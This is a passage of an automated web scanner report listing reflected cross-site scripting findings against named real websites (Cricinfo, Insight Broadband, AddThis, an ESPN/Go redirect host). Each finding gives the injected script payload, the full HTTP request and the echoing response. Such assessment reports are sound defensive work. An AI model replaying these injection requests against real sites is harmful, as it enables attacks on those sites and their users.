<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: wci031, country: us, cluster: usa, created: 2010-11-06 17:30:27 ...[SNIP]... <div class="stryEnlarge sectionImgEn" style="padding:0;margin:0 0 0 5px;" onClick="clickMap('index','homepage',null,this,s_omni.prop4,'/ci/content/current/site/index.html?e51e2"><script>alert(1)</script>8865afff4f6=1')"> ...[SNIP]...
5.143. http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fcad"><script>alert(1)</script>7b256488062 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /australia-v-sri-lanka-2010/content/story/485657.html?5fcad"><script>alert(1)</script>7b256488062=1 HTTP/1.1 Host: www.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=300 Content-Type: text/html; charset=UTF-8 X-Varnish: 708574769 X-Varnish-Cache: MISS X-Varnish: 891736454 Date: Sat, 06 Nov 2010 14:03:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 145607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: wci034, country: us, cluster: usa, created: 2010-11-06 14:03:26 ...[SNIP]... <a href="/australia-v-sri-lanka-2010/content/story/485657.html?5fcad"><script>alert(1)</script>7b256488062=1;wrappertype=print" id="printIcon" alt="Print" title="Print"> ...[SNIP]...
5.144. http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485685.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7798c"><script>alert(1)</script>fb43bde1b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /australia-v-sri-lanka-2010/content/story/485685.html?7798c"><script>alert(1)</script>fb43bde1b13=1 HTTP/1.1 Host: www.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=300 Content-Type: text/html; charset=UTF-8 X-Varnish: 708563898 X-Varnish-Cache: MISS X-Varnish: 891722930 Date: Sat, 06 Nov 2010 14:02:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 151047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: wci030, country: us, cluster: usa, created: 2010-11-06 14:02:35 ...[SNIP]... <a href="/australia-v-sri-lanka-2010/content/story/485685.html?7798c"><script>alert(1)</script>fb43bde1b13=1;wrappertype=print" id="printIcon" alt="Print" title="Print"> ...[SNIP]...
5.145. http://www.cricinfo.com/pakistan-v-south-africa-2010/content/story/485578.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2be18"><script>alert(1)</script>a66a096602c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pakistan-v-south-africa-2010/content/story/485578.html?2be18"><script>alert(1)</script>a66a096602c=1 HTTP/1.1 Host: www.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=300 Content-Type: text/html; charset=UTF-8 X-Varnish: 708580736 X-Varnish-Cache: MISS X-Varnish: 891743888 Date: Sat, 06 Nov 2010 14:03:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 155901
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: wci029, country: us, cluster: usa, created: 2010-11-06 14:03:54 ...[SNIP]... <a href="/pakistan-v-south-africa-2010/content/story/485578.html?2be18"><script>alert(1)</script>a66a096602c=1;wrappertype=print" id="printIcon" alt="Print" title="Print"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b38eb'%3b63f855f76c5 was submitted in the REST URL parameter 1. This input was echoed as b38eb';63f855f76c5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Authb38eb'%3b63f855f76c5/Authpartners.aspx HTTP/1.1 Host: www.insightbb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=d1itev550ydlno3nt5cql555; path=/; HttpOnly X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 06 Nov 2010 14:13:22 GMT Connection: close Content-Length: 46047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51194'%3bf833bbb8ea9 was submitted in the REST URL parameter 2. This input was echoed as 51194';f833bbb8ea9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Auth/Authpartners.aspx51194'%3bf833bbb8ea9 HTTP/1.1 Host: www.insightbb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=315cwg55bvxbbj45wbf33xm2; path=/; HttpOnly X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 06 Nov 2010 14:13:33 GMT Connection: close Content-Length: 45960
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<HTML> <HEAD> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" > <title>Insight Broadband</title> <script type ...[SNIP]... r") { if(event.srcElement.name == "txtZip"){ if (event.keyCode==13) { IsLocalZipValid('frmZip','/error404.aspx?404;http://www.insightbb.com:80/Auth/Authpartners.aspx51194';f833bbb8ea9'); } } }else{ if (e.target.name == "txtZip"){ if (e.keyCode==13) { IsLocalZipValid('frmZip','/error404.aspx?404;http://www.insightbb.com:80/Auth/A ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload fb9a1<script>alert(1)</script>3a2ab225915 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=fb9a1<script>alert(1)</script>3a2ab225915
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 17:30:22 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 87026
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>fb9a1<script>alert(1)</script>3a2ab225915 - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b78f"><script>alert(1)</script>25b9e7b34ca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=7b78f"><script>alert(1)</script>25b9e7b34ca
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 17:30:21 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 87040
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=7b78f"><script>alert(1)</script>25b9e7b34ca" /> ...[SNIP]...
The value of the DE2 cookie is copied into the HTML document as plain text between tags. The payload 24949<script>alert(1)</script>07dfed796ff was submitted in the DE2 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /capmon/GetDE HTTP/1.1 Host: tredir.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==24949<script>alert(1)</script>07dfed796ff; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response
HTTP/1.1 200 OK Connection: Close Content-Length: 1179 Content-Type: text/html; charset=iso-8859-1 Server: Barista/3.3.6